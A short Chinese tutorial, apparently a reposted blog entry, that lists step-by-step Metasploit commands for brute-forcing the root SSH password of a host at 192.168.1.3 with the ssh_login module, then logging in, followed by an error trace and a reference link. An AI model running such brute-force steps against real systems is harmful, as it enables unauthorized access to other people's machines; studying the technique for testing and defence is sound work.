msf ssh port:22

auxiliary/scanner/ssh/ssh_login 这个模块扫描很慢,建议使用其它多线程工具扫描。

  1. 在终端中输入命令“nmap 192.168.1.3”,对目标主机进行端口扫描,发现主机开放22端口;

  2. 在终端中输入命令“msfconsole”,启动MSF终端

  3. 在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷;

  4. 在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下;

  5. 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数;

  6. 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址;

  7. 在终端中输入“set USERNAME root”,指定登陆用户名root;

  8. 在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径;

  9. 在终端中输入“set THREADS 50”,设置暴利破解的线程数为50;

  10. 在终端中输入“run”,开始向目标主机爆破ssh的登陆帐号和密码,如果爆破成功,就会显示登陆帐号为root,密码为Xxx;

  11. 在终端中输入“ssh root@192.168.1.3”,连接目标主机;

注意:
在扫描中,如果使用ctr + c 中断之后,重新run ,就会报错,我想到的解决方式就是重新打开msf。

[-] Auxiliary failed: JSON::ParserError 783: unexpected token at '<h1>Internal Server Error</h1>'
[-] Call stack:
[-]   /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/json-2.3.0/lib/json/common.rb:156:in `parse'
...

参考

https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

原文地址:https://www.cnblogs.com/mysticbinary/p/12762841.html